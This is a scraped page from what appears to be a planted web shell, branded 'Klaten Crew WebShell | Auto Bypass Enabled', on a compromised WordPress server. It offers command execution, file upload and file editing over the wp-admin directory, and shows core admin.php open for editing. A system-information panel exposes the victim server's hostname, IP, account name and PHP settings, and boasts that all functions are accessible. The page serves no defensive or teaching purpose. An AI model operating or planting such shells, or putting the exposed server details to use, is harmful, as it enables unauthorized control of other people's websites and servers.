HanJsXploit Klaten Crew
Linux r5.a1center.net 4.18.0-513.5.1.lve.el8.x86_64 #1 SMP Tue Nov 21 10:14:49 UTC 2023 x86_64
Apache
Server: 167.114.27.228
Your IP: 216.73.217.47
System Info
HOME
home
ipifapor
public_html
wp-admin
Command Execution
Execute
File Upload
Upload
New Folder
New File
Name
Type
Size
Permissions
Modified
Actions
..
Parent
-
drwxr-xr-x
2026-07-30 20:31:46
-
css
Folder
-
0755
2026-05-26 01:27:38
images
Folder
-
0755
2026-05-26 01:27:38
includes
Folder
-
0755
2026-02-26 20:09:41
js
Folder
-
0755
2025-03-07 15:08:26
maint
Folder
-
0755
2025-03-07 15:08:26
network
Folder
-
0755
2025-03-07 15:08:26
user
Folder
-
0755
2025-03-07 15:08:26
about.php
File
17.38 KB
0644
2026-07-17 19:28:51
admin-ajax.php
File
5.03 KB
0644
2024-07-04 16:22:14
admin-footer.php
File
2.75 KB
0644
2026-01-05 21:04:58
admin-functions.php
File
479 B
0644
2025-01-22 19:06:22
admin-header.php
File
9.07 KB
0644
2026-02-15 13:02:42
admin-post.php
File
1.97 KB
0644
2025-01-16 21:18:24
admin.php
File
12.63 KB
0644
2026-03-13 04:24:40
async-upload.php
File
5.47 KB
0644
2025-08-27 15:34:28
authorize-application.php
File
10.09 KB
0644
2023-09-14 05:54:20
comment.php
File
11.37 KB
0644
2026-03-07 04:20:46
contribute.php
File
5.9 KB
0644
2026-07-17 09:47:42
credits.php
File
4.42 KB
0644
2026-07-17 09:47:41
custom-background.php
File
489 B
0644
2025-01-22 19:06:22
custom-header.php
File
499 B
0644
2025-01-22 19:06:22
customize.php
File
11.21 KB
0644
2026-05-13 12:20:44
edit-comments.php
File
14.14 KB
0644
2026-02-13 22:52:44
edit-form-advanced.php
File
28.79 KB
0644
2026-01-05 21:04:58
edit-form-blocks.php
File
14.73 KB
0644
2026-02-20 16:52:24
edit-form-comment.php
File
8.33 KB
0644
2026-02-16 22:02:48
edit-link-form.php
File
6.21 KB
0644
2025-02-08 16:44:24
edit-tag-form.php
File
10.42 KB
0644
2026-01-05 21:04:58
edit-tags.php
File
21.98 KB
0644
2026-01-05 21:04:58
edit.php
File
19.48 KB
0644
2024-10-04 03:46:16
erase-personal-data.php
File
7.33 KB
0644
2024-04-18 01:21:16
error_log
File
3.89 KB
0644
2026-06-13 14:47:14
export-personal-data.php
File
7.75 KB
0644
2024-04-18 01:21:16
export.php
File
11 KB
0644
2026-01-05 21:04:58
font-library.php
File
1.01 KB
0644
2026-01-19 22:00:30
freedoms.php
File
4.84 KB
0644
2026-07-17 09:47:42
import.php
File
7.58 KB
0644
2025-02-25 23:34:16
index.php
File
7.68 KB
0644
2023-09-14 05:54:20
install-helper.php
File
6.8 KB
0644
2022-11-20 19:10:16
install.php
File
17.91 KB
0644
2026-02-19 02:14:48
link-add.php
File
934 B
0644
2025-02-08 16:44:24
link-manager.php
File
4.26 KB
0644
2025-02-08 16:44:24
link-parse-opml.php
File
2.63 KB
0644
2026-01-09 07:40:54
link.php
File
2.89 KB
0644
2024-05-01 23:01:12
load-scripts.php
File
2.02 KB
0644
2024-08-26 04:48:14
load-styles.php
File
2.92 KB
0644
2024-11-04 20:51:18
media-new.php
File
3.17 KB
0644
2026-02-01 15:18:40
media-upload.php
File
3.58 KB
0644
2025-02-08 20:53:18
media.php
File
819 B
0644
2024-05-01 23:01:12
menu-header.php
File
9.82 KB
0644
2025-02-21 02:29:22
menu.php
File
17.72 KB
0644
2026-04-27 05:04:40
moderation.php
File
307 B
0644
2020-02-06 11:33:12
ms-admin.php
File
196 B
0644
2020-02-06 11:33:12
ms-delete-site.php
File
4.5 KB
0644
2025-04-21 16:49:32
ms-edit.php
File
216 B
0644
2020-02-06 11:33:12
ms-options.php
File
229 B
0644
2024-06-22 16:47:16
ms-sites.php
File
215 B
0644
2020-02-06 11:33:12
ms-themes.php
File
217 B
0644
2020-02-06 11:33:12
ms-upgrade-network.php
File
219 B
0644
2020-02-06 11:33:12
ms-users.php
File
215 B
0644
2020-02-06 11:33:12
my-sites.php
File
4.72 KB
0644
2026-01-06 10:57:56
nav-menus.php
File
49.07 KB
0644
2026-02-17 11:47:40
network.php
File
5.39 KB
0644
2024-03-09 03:38:08
options-connectors.php
File
1.07 KB
0644
2026-03-05 17:09:16
options-discussion.php
File
15.92 KB
0644
2025-11-11 03:51:36
options-general.php
File
22.32 KB
0644
2026-02-28 04:43:42
options-head.php
File
621 B
0644
2025-01-22 19:06:22
options-media.php
File
6.38 KB
0644
2025-09-29 03:38:32
options-permalink.php
File
21.89 KB
0644
2026-03-05 00:48:42
options-privacy.php
File
9.92 KB
0644
2026-01-09 09:22:50
options-reading.php
File
9.97 KB
0644
2026-03-23 04:06:56
options-writing.php
File
9.1 KB
0644
2026-05-08 20:59:44
options.php
File
13.93 KB
0644
2026-05-08 20:59:44
plugin-editor.php
File
13.75 KB
0644
2025-10-14 02:50:28
plugin-install.php
File
6.96 KB
0644
2024-02-20 12:27:06
plugins.php
File
30 KB
0644
2025-10-14 04:12:28
post-new.php
File
2.7 KB
0644
2024-06-15 17:34:14
post.php
File
10.03 KB
0644
2025-09-06 11:49:32
press-this.php
File
2.41 KB
0644
2026-02-20 07:25:46
privacy-policy-guide.php
File
3.67 KB
0644
2023-11-22 22:44:24
privacy.php
File
2.83 KB
0644
2026-07-17 09:47:42
profile.php
File
283 B
0644
2020-02-06 11:33:12
revision.php
File
5.7 KB
0644
2025-10-07 19:30:30
setup-config.php
File
17.52 KB
0644
2026-02-19 02:14:48
site-editor.php
File
12.07 KB
0644
2026-02-20 16:52:24
site-health-info.php
File
4.05 KB
0644
2026-02-12 02:10:40
site-health.php
File
10.18 KB
0644
2026-01-06 10:57:56
term.php
File
2.2 KB
0644
2022-06-01 23:14:10
theme-editor.php
File
16.87 KB
0644
2025-10-16 05:16:32
theme-install.php
File
23.65 KB
0644
2026-07-17 09:47:42
themes.php
File
48.25 KB
0644
2026-07-17 09:47:42
tools.php
File
3.43 KB
0644
2023-02-23 15:38:22
update-core.php
File
45.12 KB
0644
2026-01-23 23:14:36
update.php
File
12.76 KB
0644
2026-01-09 07:48:52
upgrade-functions.php
File
341 B
0644
2020-02-06 11:33:12
upgrade.php
File
6.24 KB
0644
2026-02-19 02:14:48
upload.php
File
14.9 KB
0644
2026-01-09 07:26:54
user-edit.php
File
40.35 KB
0644
2026-04-27 11:12:44
user-new.php
File
24.06 KB
0644
2026-02-16 22:02:48
users.php
File
23.44 KB
0644
2026-03-14 13:15:46
widgets-form-blocks.php
File
5.12 KB
0644
2025-08-27 15:34:28
widgets-form.php
File
19.14 KB
0644
2026-02-19 03:03:44
widgets.php
File
1.09 KB
0644
2022-03-23 00:59:04
0
items selected
Choose Action...
Delete Selected
Zip Selected
Unzip Selected
Execute Action
Clear Selection
© Klaten Crew WebShell | Auto Bypass Enabled
Create New Folder
Create New File
Edit File: admin.php
<?php /** * WordPress Administration Bootstrap * * @package WordPress * @subpackage Administration */ /** * In WordPress Administration Screens * * @since 2.3.2 */ if ( ! defined( 'WP_ADMIN' ) ) { define( 'WP_ADMIN', true ); } if ( ! defined( 'WP_NETWORK_ADMIN' ) ) { define( 'WP_NETWORK_ADMIN', false ); } if ( ! defined( 'WP_USER_ADMIN' ) ) { define( 'WP_USER_ADMIN', false ); } if ( ! WP_NETWORK_ADMIN && ! WP_USER_ADMIN ) { define( 'WP_BLOG_ADMIN', true ); } if ( isset( $_GET['import'] ) && ! defined( 'WP_LOAD_IMPORTERS' ) ) { define( 'WP_LOAD_IMPORTERS', true ); } /** Load WordPress Bootstrap */ require_once dirname( __DIR__ ) . '/wp-load.php'; nocache_headers(); if ( get_option( 'db_upgraded' ) ) { flush_rewrite_rules(); update_option( 'db_upgraded', false, true ); /** * Fires on the next page load after a successful DB upgrade. * * @since 2.8.0 */ do_action( 'after_db_upgrade' ); } elseif ( ! wp_doing_ajax() && empty( $_POST ) && (int) get_option( 'db_version' ) !== $wp_db_version ) { if ( ! is_multisite() ) { wp_redirect( admin_url( 'upgrade.php?_wp_http_referer=' . urlencode( wp_unslash( $_SERVER['REQUEST_URI'] ) ) ) ); exit; } /** * Filters whether to attempt to perform the multisite DB upgrade routine. * * In single site, the user would be redirected to wp-admin/upgrade.php. * In multisite, the DB upgrade routine is automatically fired, but only * when this filter returns true. * * If the network is 50 sites or less, it will run every time. Otherwise, * it will throttle itself to reduce load. * * @since MU (3.0.0) * * @param bool $do_mu_upgrade Whether to perform the Multisite upgrade routine. Default true. */ if ( apply_filters( 'do_mu_upgrade', true ) ) { $blog_count = get_blog_count(); /* * If there are 50 or fewer sites, run every time. Otherwise, throttle to reduce load: * attempt to do no more than threshold value, with some +/- allowed. */ if ( $blog_count <= 50 || ( $blog_count > 50 && mt_rand( 0, (int) ( $blog_count / 50 ) ) === 1 ) ) { require_once ABSPATH . WPINC . '/http.php'; $response = wp_remote_get( admin_url( 'upgrade.php?step=1' ), array( 'timeout' => 120, 'httpversion' => '1.1', ) ); /** This action is documented in wp-admin/network/upgrade.php */ do_action( 'after_mu_upgrade', $response ); unset( $response ); } unset( $blog_count ); } } require_once ABSPATH . 'wp-admin/includes/admin.php'; auth_redirect(); // Schedule Trash collection. if ( ! wp_next_scheduled( 'wp_scheduled_delete' ) && ! wp_installing() ) { wp_schedule_event( time(), 'daily', 'wp_scheduled_delete' ); } // Schedule transient cleanup. if ( ! wp_next_scheduled( 'delete_expired_transients' ) && ! wp_installing() ) { wp_schedule_event( time(), 'daily', 'delete_expired_transients' ); } set_screen_options(); $date_format = __( 'F j, Y' ); $time_format = __( 'g:i a' ); wp_enqueue_script( 'common' ); /** * $pagenow is set in vars.php. * $wp_importers is sometimes set in wp-admin/includes/import.php. * The remaining variables are imported as globals elsewhere, declared as globals here. * * @global string $pagenow The filename of the current screen. * @global array $wp_importers * @global string $hook_suffix * @global string $plugin_page * @global string $typenow The post type of the current screen. * @global string $taxnow The taxonomy of the current screen. */ global $pagenow, $wp_importers, $hook_suffix, $plugin_page, $typenow, $taxnow; $page_hook = null; $editing = false; if ( isset( $_GET['page'] ) ) { $plugin_page = wp_unslash( $_GET['page'] ); $plugin_page = plugin_basename( $plugin_page ); } if ( isset( $_REQUEST['post_type'] ) && post_type_exists( $_REQUEST['post_type'] ) ) { $typenow = $_REQUEST['post_type']; } else { $typenow = ''; } if ( isset( $_REQUEST['taxonomy'] ) && taxonomy_exists( $_REQUEST['taxonomy'] ) ) { $taxnow = $_REQUEST['taxonomy']; } else { $taxnow = ''; } if ( WP_NETWORK_ADMIN ) { require ABSPATH . 'wp-admin/network/menu.php'; } elseif ( WP_USER_ADMIN ) { require ABSPATH . 'wp-admin/user/menu.php'; } else { require ABSPATH . 'wp-admin/menu.php'; } if ( current_user_can( 'manage_options' ) ) { wp_raise_memory_limit( 'admin' ); } /** * Fires as an admin screen or script is being initialized. * * Note, this does not just run on user-facing admin screens. * It runs on admin-ajax.php and admin-post.php as well. * * This is roughly analogous to the more general {@see 'init'} hook, which fires earlier. * * @since 2.5.0 */ do_action( 'admin_init' ); if ( isset( $plugin_page ) ) { if ( ! empty( $typenow ) ) { $the_parent = $pagenow . '?post_type=' . $typenow; } else { $the_parent = $pagenow; } $page_hook = get_plugin_page_hook( $plugin_page, $the_parent ); if ( ! $page_hook ) { $page_hook = get_plugin_page_hook( $plugin_page, $plugin_page ); // Back-compat for plugins using add_management_page(). if ( empty( $page_hook ) && 'edit.php' === $pagenow && get_plugin_page_hook( $plugin_page, 'tools.php' ) ) { // There could be plugin specific params on the URL, so we need the whole query string. if ( ! empty( $_SERVER['QUERY_STRING'] ) ) { $query_string = $_SERVER['QUERY_STRING']; } else { $query_string = 'page=' . $plugin_page; } wp_redirect( admin_url( 'tools.php?' . $query_string ) ); exit; } } unset( $the_parent ); } $hook_suffix = ''; if ( isset( $page_hook ) ) { $hook_suffix = $page_hook; } elseif ( isset( $plugin_page ) ) { $hook_suffix = $plugin_page; } elseif ( isset( $pagenow ) ) { $hook_suffix = $pagenow; } set_current_screen(); // Handle plugin admin pages. if ( isset( $plugin_page ) ) { if ( $page_hook ) { /** * Fires before a particular screen is loaded. * * The load-* hook fires in a number of contexts. This hook is for plugin screens * where a callback is provided when the screen is registered. * * The dynamic portion of the hook name, `$page_hook`, refers to a mixture of plugin * page information including: * 1. The page type. If the plugin page is registered as a submenu page, such as for * Settings, the page type would be 'settings'. Otherwise the type is 'toplevel'. * 2. A separator of '_page_'. * 3. The plugin basename minus the file extension. * * Together, the three parts form the `$page_hook`. Citing the example above, * the hook name used would be 'load-settings_page_pluginbasename'. * * @see get_plugin_page_hook() * * @since 2.1.0 */ do_action( "load-{$page_hook}" ); // phpcs:ignore WordPress.NamingConventions.ValidHookName.UseUnderscores if ( ! isset( $_GET['noheader'] ) ) { require_once ABSPATH . 'wp-admin/admin-header.php'; } /** * Used to call the registered callback for a plugin screen. * * This hook uses a dynamic hook name, `$page_hook`, which refers to a mixture of plugin * page information including: * 1. The page type. If the plugin page is registered as a submenu page, such as for * Settings, the page type would be 'settings'. Otherwise the type is 'toplevel'. * 2. A separator of '_page_'. * 3. The plugin basename minus the file extension. * * Together, the three parts form the `$page_hook`. Citing the example above, * the hook name used would be 'settings_page_pluginbasename'. * * @see get_plugin_page_hook() * * @since 1.5.0 */ do_action( $page_hook ); } else { if ( validate_file( $plugin_page ) ) { wp_die( __( 'Invalid plugin page.' ) ); } if ( ! ( file_exists( WP_PLUGIN_DIR . "/$plugin_page" ) && is_file( WP_PLUGIN_DIR . "/$plugin_page" ) ) && ! ( file_exists( WPMU_PLUGIN_DIR . "/$plugin_page" ) && is_file( WPMU_PLUGIN_DIR . "/$plugin_page" ) ) ) { /* translators: %s: Admin page generated by a plugin. */ wp_die( sprintf( __( 'Cannot load %s.' ), htmlentities( $plugin_page ) ) ); } /** * Fires before a particular screen is loaded. * * The load-* hook fires in a number of contexts. This hook is for plugin screens * where the file to load is directly included, rather than the use of a function. * * The dynamic portion of the hook name, `$plugin_page`, refers to the plugin basename. * * @see plugin_basename() * * @since 1.5.0 */ do_action( "load-{$plugin_page}" ); // phpcs:ignore WordPress.NamingConventions.ValidHookName.UseUnderscores if ( ! isset( $_GET['noheader'] ) ) { require_once ABSPATH . 'wp-admin/admin-header.php'; } if ( file_exists( WPMU_PLUGIN_DIR . "/$plugin_page" ) ) { include WPMU_PLUGIN_DIR . "/$plugin_page"; } else { include WP_PLUGIN_DIR . "/$plugin_page"; } } require_once ABSPATH . 'wp-admin/admin-footer.php'; exit; } elseif ( isset( $_GET['import'] ) ) { $importer = $_GET['import']; if ( ! current_user_can( 'import' ) ) { wp_die( __( 'Sorry, you are not allowed to import content into this site.' ) ); } if ( validate_file( $importer ) ) { wp_redirect( admin_url( 'import.php?invalid=' . $importer ) ); exit; } if ( ! isset( $wp_importers[ $importer ] ) || ! is_callable( $wp_importers[ $importer ][2] ) ) { wp_redirect( admin_url( 'import.php?invalid=' . $importer ) ); exit; } /** * Fires before an importer screen is loaded. * * The dynamic portion of the hook name, `$importer`, refers to the importer slug. * * Possible hook names include: * * - `load-importer-blogger` * - `load-importer-wpcat2tag` * - `load-importer-livejournal` * - `load-importer-mt` * - `load-importer-rss` * - `load-importer-tumblr` * - `load-importer-wordpress` * * @since 3.5.0 */ do_action( "load-importer-{$importer}" ); // phpcs:ignore WordPress.NamingConventions.ValidHookName.UseUnderscores // Used in the HTML title tag. $title = __( 'Import' ); $parent_file = 'tools.php'; $submenu_file = 'import.php'; if ( ! isset( $_GET['noheader'] ) ) { require_once ABSPATH . 'wp-admin/admin-header.php'; } require_once ABSPATH . 'wp-admin/includes/upgrade.php'; define( 'WP_IMPORTING', true ); /** * Filters whether to filter imported data through kses on import. * * Multisite uses this hook to filter all data through kses by default, * as a super administrator may be assisting an untrusted user. * * @since 3.1.0 * * @param bool $force Whether to force data to be filtered through kses. Default false. */ if ( apply_filters( 'force_filtered_html_on_import', false ) ) { kses_init_filters(); // Always filter imported data with kses on multisite. } call_user_func( $wp_importers[ $importer ][2] ); require_once ABSPATH . 'wp-admin/admin-footer.php'; // Make sure rules are flushed. flush_rewrite_rules( false ); exit; } else { /** * Fires before a particular screen is loaded. * * The load-* hook fires in a number of contexts. This hook is for core screens. * * The dynamic portion of the hook name, `$pagenow`, is a global variable * referring to the filename of the current screen, such as 'admin.php', * 'post-new.php' etc. A complete hook for the latter would be * 'load-post-new.php'. * * @since 2.1.0 */ do_action( "load-{$pagenow}" ); // phpcs:ignore WordPress.NamingConventions.ValidHookName.UseUnderscores /* * The following hooks are fired to ensure backward compatibility. * In all other cases, 'load-' . $pagenow should be used instead. */ if ( 'page' === $typenow ) { if ( 'post-new.php' === $pagenow ) { /** This action is documented in wp-admin/admin.php */ do_action( 'load-page-new.php' ); // phpcs:ignore WordPress.NamingConventions.ValidHookName.UseUnderscores } elseif ( 'post.php' === $pagenow ) { /** This action is documented in wp-admin/admin.php */ do_action( 'load-page.php' ); // phpcs:ignore WordPress.NamingConventions.ValidHookName.UseUnderscores } } elseif ( 'edit-tags.php' === $pagenow ) { if ( 'category' === $taxnow ) { /** This action is documented in wp-admin/admin.php */ do_action( 'load-categories.php' ); // phpcs:ignore WordPress.NamingConventions.ValidHookName.UseUnderscores } elseif ( 'link_category' === $taxnow ) { /** This action is documented in wp-admin/admin.php */ do_action( 'load-edit-link-categories.php' ); // phpcs:ignore WordPress.NamingConventions.ValidHookName.UseUnderscores } } elseif ( 'term.php' === $pagenow ) { /** This action is documented in wp-admin/admin.php */ do_action( 'load-edit-tags.php' ); // phpcs:ignore WordPress.NamingConventions.ValidHookName.UseUnderscores } } if ( ! empty( $_REQUEST['action'] ) ) { $action = $_REQUEST['action']; /** * Fires when an 'action' request variable is sent. * * The dynamic portion of the hook name, `$action`, refers to * the action derived from the `GET` or `POST` request. * * @since 2.6.0 */ do_action( "admin_action_{$action}" ); }
Rename
Change Permissions
Common permissions: 755 (rwxr-xr-x), 644 (rw-r--r--), 777 (rwxrwxrwx)
System Information
Uname: Linux r5.a1center.net 4.18.0-513.5.1.lve.el8.x86_64 #1 SMP Tue Nov 21 10:14:49 UTC 2023 x86_64 Software: Apache PHP Version: 8.3.31 Protocol: HTTP/1.1 Server IP: 167.114.27.228 Your IP: 216.73.217.47 Mail: ON Curl: ON Owner: ipifapor MySQL: ON Disabled Functions: All functions are accessible Auto Bypass: ENABLED